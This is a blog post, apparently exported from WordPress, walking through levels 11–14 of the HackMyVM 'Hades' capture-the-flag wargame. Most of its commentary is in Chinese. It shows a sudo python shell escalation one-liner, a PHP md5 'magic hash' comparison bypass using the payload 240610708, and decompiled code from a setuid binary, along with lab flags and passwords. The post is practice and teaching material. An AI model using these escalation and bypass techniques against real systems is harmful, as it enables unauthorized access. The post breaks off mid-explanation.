{"id":722,"date":"2024-07-06T16:35:00","date_gmt":"2024-07-06T08:35:00","guid":{"rendered":"http:\/\/162.14.82.114\/?p=722"},"modified":"2024-07-06T16:35:00","modified_gmt":"2024-07-06T08:35:00","slug":"hmvlabs-hades11-20","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/722\/07\/06\/2024\/","title":{"rendered":"HMVLabs-Hades(11-20)"},"content":{"rendered":"

11 asia<\/h2>\n
asia@hades:~$ ls -la\ntotal 32\ndrwxr-x--- 2 root asia 4096 Apr  5 06:36 .\ndrwxr-xr-x 1 root root 4096 Apr  5 06:36 ..\n-rw-r--r-- 1 asia asia  220 Apr 23  2023 .bash_logout\n-rw-r--r-- 1 asia asia 3526 Apr 23  2023 .bashrc\n-rw-r--r-- 1 asia asia  807 Apr 23  2023 .profile\n-rw-r----- 1 root asia   22 Apr  5 06:36 flagz.txt\n-rw-r----- 1 root asia  188 Apr  5 06:36 mission.txt\nasia@hades:~$ grep -ra '\\^*\\^' .\n.\/flagz.txt:^ngXdULWFWKCGtgxAQNv^\nasia@hades:~$ cat mission.txt \n################\n# MISSION 0x11 #\n################\n\n## EN ##\nThe user asteria is teaching us to program in python.\n\n## ES ##\nLa usuaria asteria nos esta ense\u00f1ando a programar en python.\nasia@hades:~$ sudo -l\nMatching Defaults entries for asia on hades:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin, use_pty\n\nUser asia may run the following commands on hades:\n    (asteria) NOPASSWD: \/usr\/bin\/python3<\/code><\/pre>\n
\u53c2\u8003 https:\/\/gtfobins.github.io\/gtfobins\/python\/#sudo<\/a>
\nIf the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.<\/p>\n
sudo python -c 'import os; os.system("\/bin\/sh")'<\/code><\/pre>\n
\u8fdb\u884c\u63d0\u6743\uff1a<\/p>\n
asia@hades:~$ ls -la\ntotal 32\ndrwxr-x--- 2 root asia 4096 Apr  5 06:36 .\ndrwxr-xr-x 1 root root 4096 Apr  5 06:36 ..\n-rw-r--r-- 1 asia asia  220 Apr 23  2023 .bash_logout\n-rw-r--r-- 1 asia asia 3526 Apr 23  2023 .bashrc\n-rw-r--r-- 1 asia asia  807 Apr 23  2023 .profile\n-rw-r----- 1 root asia   22 Apr  5 06:36 flagz.txt\n-rw-r----- 1 root asia  188 Apr  5 06:36 mission.txt\nasia@hades:~$ grep -ra '\\^*\\^' .\n.\/flagz.txt:^ngXdULWFWKCGtgxAQNv^\nasia@hades:~$ cat mission.txt \n################\n# MISSION 0x11 #\n################\n\n## EN ##\nThe user asteria is teaching us to program in python.\n\n## ES ##\nLa usuaria asteria nos esta ense\u00f1ando a programar en python.\nasia@hades:~$ sudo -l\nMatching Defaults entries for asia on hades:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin, use_pty\n\nUser asia may run the following commands on hades:\n    (asteria) NOPASSWD: \/usr\/bin\/python3\nasia@hades:~$ sudo -u asteria \/usr\/bin\/python3 -c 'import os; os.system("\/bin\/bash")'\nasteria@hades:\/pwned\/asia$ cd ~;whoami;id;ls -la\nasteria\nuid=2003(asteria) gid=2003(asteria) groups=2003(asteria)\ntotal 36\ndrwxr-x--- 2 root    asteria 4096 Apr  5 06:36 .\ndrwxr-xr-x 1 root    root    4096 Apr  5 06:36 ..\n-rw-r--r-- 1 asteria asteria  220 Apr 23  2023 .bash_logout\n-rw-r--r-- 1 asteria asteria 3526 Apr 23  2023 .bashrc\n-rw-r--r-- 1 asteria asteria  807 Apr 23  2023 .profile\n-rw-r----- 1 root    asteria   22 Apr  5 06:36 flagz.txt\n-rw-r----- 1 root    asteria  145 Apr  5 06:36 mission.txt\n-rw-r----- 1 root    asteria  161 Apr  5 06:36 sihiri_old.php<\/code><\/pre>\n
12 asteria<\/h2>\n
11: asteria\/hawMVJCYrBgoDAMVhuwT<\/p>\n
asteria@hades:~$ grep -ra '\\^*\\^' .\n.\/sihiri_old.php:print("Incorrect ^^");\n.\/flagz.txt:^xSRhIftMsAwWvBAnqNZ^\nasteria@hades:~$ cat mission.txt \n################\n# MISSION 0x12 #\n################\n\n## EN ##\nThe user astraea believes in magic. \n\n## ES ##\nLa usuaria astraea cree en la magia.\nasteria@hades:~$ cat sihiri_old.php \n\n<?php\n$pass = hash('md5', $_GET['pass']);\n$pass2 = hash('md5',"ASTRAEA_PASS");\nif($pass == $pass2){\nprint("ASTRAEA_PASS");\n}\nelse{\nprint("Incorrect ^^");\n}\n?><\/code><\/pre>\n
\u5982\u679c\u4e24\u4e2a\u5b57\u7b26\u7ecfMD5\u52a0\u5bc6\u540e\u7684\u503c\u4e3a 0exxxxx\u5f62\u5f0f\uff0c\u5c31\u4f1a\u88ab\u8ba4\u4e3a\u662f\u79d1\u5b66\u8ba1\u6570\u6cd5\uff0c\u4e14\u8868\u793a\u7684\u662f0*10\u7684xxxx\u6b21\u65b9\uff0c\u8fd8\u662f\u96f6\uff0c\u90fd\u662f\u76f8\u7b49\u7684\u3002
\n\u968f\u4fbf\u627e\u51e0\u4e2a\u8bd5\u4e00\u4e0b https:\/\/github.com\/spaze\/hashes\/blob\/master\/md5.md<\/a><\/p>\n
asteria@hades:~$ curl http:\/\/0.0.0.0\/sihiri.php\n\nIncorrect ^^\nasteria@hades:~$ curl http:\/\/0.0.0.0\/sihiri.php?pass=240610708&pass2=QLTHNDT\n[1] 3820936\nasteria@hades:~$ \nnZkEYtjvHElOtupXKzTE<\/code><\/pre>\n
13 astraea<\/h2>\n
asteria@hades:~$ ssh astraea@0.0.0\nThe authenticity of host '0.0.0.0 (0.0.0.0)' can't be established.\nED25519 key fingerprint is SHA256:5QshhvvnibVTWOxgK9XbUejVSLahU6clfnK1Iku0wsg.\nThis key is not known by any other names.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nCould not create directory '\/pwned\/asteria\/.ssh' (Permission denied).\nFailed to add the host to the list of known hosts (\/pwned\/asteria\/.ssh\/known_hosts).\n\n                                                      .     **\n                                                   *           *.\n                                                                  ,*\n                                                                     *,\n                                             ,                         ,*\n                                          .,                              *,\n                                       \/                                    *\n                                    ,*                                        *,\n                                 \/.                                            .*.\n                                                                _____\n                __     __           _____         ____________      _____\\    \\            _____\n                \/  \\   \/  \\        \/      |_       \\           \\    \/    \/ |    |      _____\\    \\\n                \/   \/| |\\   \\      \/         \\       \\           \\  \/    \/  \/___\/|     \/    \/ \\    |\n                \/   \/\/   \\   \\    |     \/\\    \\       |    \/\\     ||    |__ |___|\/    |    |  \/___\/|\n                \/    \\_____\/    \\   |    |  |    \\      |   |  |    ||       \\       ____\\    \\ |   ||\n                \/    \/\\_____\/\\    \\  |     \\\/      \\     |    \\\/     ||     __\/ __   \/    \/\\    \\|___|\/\n                \/    \/\/\\_____\/\\    \\ |\\      \/\\     \\   \/           \/||\\    \\  \/  \\ |    |\/ \\    \\      \n                \/____\/ |       | \\____\\| \\_____\\ \\_____\\ \/___________\/ || \\____\\\/    ||\\____\\ \/____\/|\n                |    | |       | |    || |     | |     ||           | \/ | |    |____\/|| |   ||    | |\n                |____|\/         \\|____| \\|_____|\\|_____||___________|\/   \\|____|   | | \\|___||____|\/\n                                                                        |___|\/\n\n                                       **                                    **.\n                                          ,*                                **\n                                             *,                          ,*\n                                                *                      **\n                                                *,                .*\n                                                   *.           **\n                                                      **      ,*,\n                                                         ** *,\n                                        [== HMVLabs Chapter 2: Hades ==]\n\n                                         +===========================+\n                                         |        Respect &          |\n                                         |        Have fun!          |\n                                         |                           |\n                                         | https:\/\/hackmyvm.eu\/hades |\n                                         +===========================+\n\nastraea@0.0.0.0's password:\n^KssHQIAFsxUamecyXIUk^\nConnection to 0.0.0.0 closed.\nasteria@hades:~$ ^C\nasteria@hades:~$ ssh astraea@0.0.0.0\nThe authenticity of host '0.0.0.0 (0.0.0.0)' can't be established.\nED25519 key fingerprint is SHA256:5QshhvvnibVTWOxgK9XbUejVSLahU6clfnK1Iku0wsg.\nThis key is not known by any other names.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nCould not create directory '\/pwned\/asteria\/.ssh' (Permission denied).\nFailed to add the host to the list of known hosts (\/pwned\/asteria\/.ssh\/known_hosts).\n\n                                                      .     **\n                                                   *           *.\n                                                                  ,*\n                                                                     *,\n                                             ,                         ,*                         \n                                          .,                              *,\n                                       \/                                    *\n                                    ,*                                        *,\n                                 \/.                                            .*.\n                                                                _____\n                __     __           _____         ____________      _____\\    \\            _____\n                \/  \\   \/  \\        \/      |_       \\           \\    \/    \/ |    |      _____\\    \\\n                \/   \/| |\\   \\      \/         \\       \\           \\  \/    \/  \/___\/|     \/    \/ \\    |\n                \/   \/\/   \\   \\    |     \/\\    \\       |    \/\\     ||    |__ |___|\/    |    |  \/___\/|\n                \/    \\_____\/    \\   |    |  |    \\      |   |  |    ||       \\       ____\\    \\ |   ||\n                \/    \/\\_____\/\\    \\  |     \\\/      \\     |    \\\/     ||     __\/ __   \/    \/\\    \\|___|\/\n                \/    \/\/\\_____\/\\    \\ |\\      \/\\     \\   \/           \/||\\    \\  \/  \\ |    |\/ \\    \\\n                \/____\/ |       | \\____\\| \\_____\\ \\_____\\ \/___________\/ || \\____\\\/    ||\\____\\ \/____\/|\n                |    | |       | |    || |     | |     ||           | \/ | |    |____\/|| |   ||    | |\n                |____|\/         \\|____| \\|_____|\\|_____||___________|\/   \\|____|   | | \\|___||____|\/\n                                                                        |___|\/\n\n                                       **                                    **.\n                                          ,*                                **\n                                             *,                          ,*\n                                                *                      **\n                                                *,                .*\n                                                   *.           **\n                                                      **      ,*,\n                                                         ** *,\n                                        [== HMVLabs Chapter 2: Hades ==]\n\n                                         +===========================+\n                                         |        Respect &          |\n                                         |        Have fun!          |\n                                         |                           |\n                                         | https:\/\/hackmyvm.eu\/hades |\n                                         +===========================+\n\nastraea@0.0.0.0's password:\n^KssHQIAFsxUamecyXIUk^\nConnection to 0.0.0.0 closed.\nasteria@hades:~$<\/code><\/pre>\n
\u5565\u60c5\u51b5\uff0c\u63d0\u4ea4flag\uff0c\u53d1\u73b0\u662f\u9690\u85cf\u7684\u3002\u3002\u3002\u3002\u3002\u8fd9\u4e2a\u610f\u601d\u5c31\u662f\u767b\u4e0a\u53bb\u4e86\uff0c\u4f46\u662f\u88ab\u79d2\u8e22\u6389\u4e86\uff0c\u5c1d\u8bd5\u7ef4\u6301\u4e00\u4e0b\uff1a<\/p>\n
asteria@hades:~$ ssh astraea@0.0.0.0 -t 'whoami;id'<\/code><\/pre>\n
\u4f46\u662f\u6267\u884c\u4e0d\u4e86\uff0c\u5c1d\u8bd5\u5176\u4ed6\u8def\u5b50\uff0c\u770b\u7fa4\u4e3b\u89c6\u9891\u8bf4\u4f20\u4e86busybox\u5728\/var\/tmp<\/code>\uff0c\u8fd9\u662f\u6240\u6709\u7528\u6237\u90fd\u53ef\u4ee5\u7f16\u8f91\u4e34\u65f6\u6587\u4ef6\u7684\u5730\u65b9\uff1a<\/p>\n
asteria@hades:~$ ss -h\nbash: \/usr\/bin\/ss: Permission denied\nasteria@hades:~$ nc -h\nbash: nc: command not found\nasteria@hades:~$ ls \/var\/tmp\n07         31                a.txt           atalanta.txt  brute_31.sh  cve-2024-1086  flagz.txt   idd                  mission.txt.1  numbers.save  some2                        xx\n1.gif      32                aaa.txt         aura.py       busybox      d              fscan       level16.py           name.txt       penelope      ss                           zzz\n1.txt      333               ab.txt          av-98         c            dummy.png      fun.png     libexpect.so.5.45.4  names.txt      proc          taotao\n100.txt    999               anames.txt      av98.py       cat          expect         get-pip.py  linpeas.sh           new.py         pwned         taotaotao\n123        AV-98-master.zip  ar.sh           bNU           comb.txt     fi.sh          hatechars   mang                 new.sh         r.sh          test.py\n12345      AV98              arete           bbb           conky.conf   fibi           id          mission.ttx          new.txt        result.txt    three_char_conbinations.txt\n12345.txt  a                 arete_pass.txt  bbb.txt       core         flag.txt.1     id.zip      mission.txt          nmap           s             weird\nasteria@hades:\/var\/tmp$ .\/busybox netstat -alutp\nnetstat: can't scan \/proc - are you root?\nActive Internet connections (servers and established)\nProto Recv-Q Send-Q Local Address           Foreign Address         State       PID\/Program name    \ntcp        0      0 localhost:38595         0.0.0.0:*               LISTEN      -\ntcp        0      0 localhost:ircd          0.0.0.0:*               LISTEN      -\ntcp        0      0 0.0.0.0:http            0.0.0.0:*               LISTEN      -\ntcp        0      0 0.0.0.0:ssh             0.0.0.0:*               LISTEN      -\ntcp        0      0 localhost:ssh           localhost:45418         ESTABLISHED -\ntcp        0      0 localhost:ssh           localhost:45420         ESTABLISHED -\ntcp        0      0 localhost:ssh           localhost:45424         ESTABLISHED -\ntcp        0      0 localhost:45420         localhost:ssh           ESTABLISHED -\ntcp        0      0 localhost:45428         localhost:ssh           ESTABLISHED -\ntcp        0      0 localhost:ssh           localhost:45414         ESTABLISHED -\ntcp        0      0 localhost:45414         localhost:ssh           ESTABLISHED -\ntcp        0      0 localhost:ssh           localhost:45416         ESTABLISHED -\ntcp        0      0 localhost:45418         localhost:ssh           ESTABLISHED -\ntcp        0      0 localhost:ssh           localhost:45428         ESTABLISHED -\ntcp        0      0 localhost:45422         localhost:ssh           ESTABLISHED -\ntcp        0      0 localhost:45416         localhost:ssh           ESTABLISHED -\ntcp        0      0 localhost:45426         localhost:ssh           ESTABLISHED -\ntcp        0      0 localhost:ssh           localhost:45426         ESTABLISHED -\ntcp        0      0 localhost:ssh           localhost:45422         ESTABLISHED -\ntcp        0   1368 hades:ssh               218.201.30.54:3343      ESTABLISHED -\ntcp        0      0 localhost:45424         localhost:ssh           ESTABLISHED -\ntcp        0      0 :::1965                 :::*                    LISTEN      -\ntcp        0      0 :::http                 :::*                    LISTEN      -\ntcp        0      0 :::ftp                  :::*                    LISTEN      -\ntcp        0      0 :::ssh                  :::*                    LISTEN      -\nudp        0      0 localhost:56483         0.0.0.0:*                           -\nudp        0      0 0.0.0.0:44595           0.0.0.0:*                           -\nudp        0      0 0.0.0.0:55168           0.0.0.0:*                           -<\/code><\/pre>\n
\u53d1\u73b0\u5f00\u542f\u4e86ftp\u670d\u52a1\uff0c\u5c1d\u8bd5\u8fdb\u884c\u8fde\u63a5\u83b7\u53d6flag\uff0c\u518d\u5728\u5e73\u53f0\u63d0\u4ea4\u83b7\u53d6\u5bc6\u7801\uff1a<\/p>\n
ria@hades:\/var\/tmp$ ftp astraea@0.0.0.0\nConnected to 0.0.0.0.\n220 (vsFTPd 3.0.3)\n331 Please specify the password.\nPassword: \n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp> dir\n229 Entering Extended Passive Mode (|||53537|)\n150 Here comes the directory listing.\n-rw-r-----    1 0        2004           21 Apr 05 06:36 atalanta.txt\n-rw-r-----    1 0        2004           22 Apr 05 06:36 flagz.txt\n-rw-r-----    1 0        2004          181 Apr 05 06:36 mission.txt\n226 Directory send OK.\nftp> get flagz.txt\nlocal: flagz.txt remote: flagz.txt\n229 Entering Extended Passive Mode (|||47975|)\n150 Opening BINARY mode data connection for flagz.txt (22 bytes).\n100% |*****************************************************************************************************************************************|    22       15.98 KiB\/s    00:00 ETA \n226 Transfer complete.\n22 bytes received in 00:00 (3.49 KiB\/s)\nftp> exit\n221 Goodbye.\nasteria@hades:\/var\/tmp$ cat flagz.txt \n^nqTHTzMzDPDJrKPCfVR^\n<\/code><\/pre>\n
12: astraea\/nZkEYtjvHElOtupXKzTE
\n\u5fd8\u4e86\u8fde\u4e0d\u4e0a\u4e86\u3002\u3002\u3002\u3002
\n\u4e0b\u8f7d mission\u63a5\u7740\u505a\u5427\uff1a<\/p>\n
asteria@hades:\/var\/tmp$ ftp astraea@0.0.0.0\nConnected to 0.0.0.0.\n220 (vsFTPd 3.0.3)\n331 Please specify the password.\nPassword: \n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp> dir \n229 Entering Extended Passive Mode (|||10777|)\n150 Here comes the directory listing.\n-rw-r-----    1 0        2004           21 Apr 05 06:36 atalanta.txt\n-rw-r-----    1 0        2004           22 Apr 05 06:36 flagz.txt\n-rw-r-----    1 0        2004          181 Apr 05 06:36 mission.txt\n226 Directory send OK.\nftp> get mission.txt\nlocal: mission.txt remote: mission.txt\n229 Entering Extended Passive Mode (|||31679|)\n150 Opening BINARY mode data connection for mission.txt (181 bytes).\n100% |*****************************************************************************************************************************************|   181      145.24 KiB\/s    00:00 ETA \n226 Transfer complete.\n181 bytes received in 00:00 (29.82 KiB\/s)\nftp> get atalanta.txt\nlocal: atalanta.txt remote: atalanta.txt\n229 Entering Extended Passive Mode (|||61686|)\n150 Opening BINARY mode data connection for atalanta.txt (21 bytes).\n100% |*****************************************************************************************************************************************|    21       16.53 KiB\/s    00:00 ETA \n226 Transfer complete.\n21 bytes received in 00:00 (3.43 KiB\/s)\nftp> exit\n221 Goodbye.\nasteria@hades:\/var\/tmp$ cat mission.txt\n################\n# MISSION 0x13 #\n################\n\n## EN ##\nThe user atalanta has done something with our account. \n\n## ES ##\nLa usuaria atalanta ha hecho algo con nuestra cuenta.\nasteria@hades:\/var\/tmp$ cat atalanta.txt \nmUcSNQlaXtwSvGcgeTYZ<\/code><\/pre>\n
14 atalanta<\/h2>\n
atalanta@hades:~$ ls -la\ntotal 60\ndrwxr-x--- 1 root     atalanta  4096 Apr  5 06:36 .\ndrwxr-xr-x 1 root     root      4096 Apr  5 06:36 ..\n-rw-r--r-- 1 atalanta atalanta   220 Apr 23  2023 .bash_logout\n-rw-r--r-- 1 atalanta atalanta  3526 Apr 23  2023 .bashrc\n-rw-r--r-- 1 atalanta atalanta   807 Apr 23  2023 .profile\n-rw-r----- 1 root     atalanta    22 Apr  5 06:36 flagz.txt\n-rw-r----- 1 root     atalanta   237 Apr  5 06:36 mission.txt\n-r-sr-s--- 1 root     atalanta 16608 Apr  5 06:36 weird\n-rwxrwxrwx 1 atalanta atalanta    21 Jun 12 09:05 weird.c\natalanta@hades:~$ grep -ra '\\^*\\^' .\n.\/flagz.txt:^XXZbDJTQQWCHJWTGeOw^\n.\/weird:\ufffd@\ufffd\ufffd\ufffd\ufffd%r\/h\n                  \ufffd0\ufffd\ufffd\ufffd\ufffd%j\/h\n\ufffd\ufffd\ufffd\ufffd\ufffd%\ufffd.f\ufffd1\ufffdI\ufffd\ufffd^H\ufffd\ufffdH\ufffd\ufffd\ufffdPTE1\ufffd1\ufffdH\ufffd=\ufffd\ufffd.\ufffdf.\ufffd@H\ufffd=)\/H\ufffd"\/H9\ufffdtH\ufffd^.H\ufffd\ufffdt  \ufffd\ufffd\ufffd\ufffd\ufffdH\ufffd=\ufffd.H\ufffd5\ufffd.H)\ufffdH\ufffd\ufffdH\ufffd\ufffd?H\ufffd\ufffdH\ufffdH\ufffd\ufffdtH\ufffd-.H\ufffd\ufffd\ufffd\ufffdfD\ufffd\ufffd\ufffd\ufffd\ufffd=\ufffd.u+UH\ufffd=\natalanta@hades:~$ cat mission.txt \n################\n# MISSION 0x14 #\n################\n\n## EN ##\nUser athena lets us run her program, but she hasn't left us her source code.\n\n## ES ##\nLa usuaria athena nos deja ejecutar su programa, pero no nos ha dejado su codigo fuente.\n\natalanta@hades:~$ .\/weird\nHOME detected: \/pwned\/atalanta\nSegmentation fault\natalanta@hades:~$ cat weird.c\nkmQMpZsXgOsnzGReRcoV<\/code><\/pre>\n
\u5565\u60c5\u51b5\uff1f\u5148\u628a\u6587\u4ef6\u4f20\u5230\/var\/tmp<\/code>\uff0c\u518d\u4f20\u5230\u672c\u673a\u8fdb\u884c\u9006\u5411\u5206\u6790\u4e00\u4e0b\uff1a<\/p>\n
int __cdecl main(int argc, const char **argv, const char **envp)\n{\n  char *v3; \/\/ rax\n  char ptr; \/\/ [rsp+Fh] [rbp-4B1h]\n  char v6; \/\/ [rsp+400h] [rbp-C0h]\n  int v7; \/\/ [rsp+418h] [rbp-A8h]\n  __uid_t uid; \/\/ [rsp+41Ch] [rbp-A4h]\n  struct passwd *v9; \/\/ [rsp+490h] [rbp-30h]\n  int v10; \/\/ [rsp+49Ch] [rbp-24h]\n  FILE *v11; \/\/ [rsp+4A0h] [rbp-20h]\n  char *command; \/\/ [rsp+4A8h] [rbp-18h]\n  FILE *stream; \/\/ [rsp+4B0h] [rbp-10h]\n  char *file; \/\/ [rsp+4B8h] [rbp-8h]\n\n  setuid(0x7D6u);\n  setgid(0x7D6u);\n  file = getenv("HOME");\n  printf("HOME detected: %s\\n", file);\n  v3 = getenv("HOME");\n  stream = fopen(v3, "w");\n  command = "\/bin\/cat \/var\/lib\/me";\n  ptr = 0;\n  v11 = popen("\/bin\/cat \/var\/lib\/me", "r");\n  if ( !v11 )\n  {\n    perror("popen() failed.");\n    exit(1);\n  }\n  while ( fread(&ptr, 1uLL, 1uLL, v11) )\n    fputc(ptr, stream);\n  pclose(v11);\n  pclose(stream);\n  v10 = stat(file, (struct stat *)&v6);\n  v9 = getpwuid(uid);\n  if ( v9->pw_name != "atalanta" )\n    v10 = chmod(file, v7 & 0xFFFFFFCA | 0x10);\n  stat(file, (struct stat *)&v6);\n  return 0;<\/code><\/pre>\n
\u58a8\u5e08\u5085blog<\/a>\u6709\u6e90\u7801\uff1a<\/p>\n
#include <stdlib.h>\n#include <string.h>\n#include <sys\/stat.h>\n#include <pwd.h>\nint main()\n{\n    setuid(2006);\n    setgid(2006);\n    const char *filename;\n    struct stat fs;\n    int r;\n    filename = getenv("HOME");\n    printf ("HOME detected: %s\\n",filename);\n    char cmd[1000];\n    FILE *out_file = fopen(getenv("HOME"), "w");\n    FILE *fpipe;\n    char *command = "\/bin\/cat \/var\/lib\/me";\n    char c = 0;\n\n    if (0 == (fpipe = (FILE*)popen(command, "r")))\n    {\n        perror("popen() failed.");\n        exit(EXIT_FAILURE);\n    }\n\n    while (fread(&c, sizeof c, 1, fpipe))\n    {\n        fprintf(out_file, "%c",c);\n    }\n    pclose(fpipe);\n    pclose(out_file);\n    r = stat(filename,&fs);\n    struct passwd *pw = getpwuid(fs.st_uid);\n    if (pw->pw_name != "atalanta"){\n    r = chmod(filename, fs.st_mode & ~(S_IROTH)+~(S_IRGRP) | S_IWGRP );\n    }\n    stat(filename,&fs);\n    return EXIT_SUCCESS;\n}<\/code><\/pre>\n
\u811a\u672c\u505a\u4e86\u5982\u4e0b\u51e0\u4ef6\u4e8b\u60c5\uff1a<\/p>\n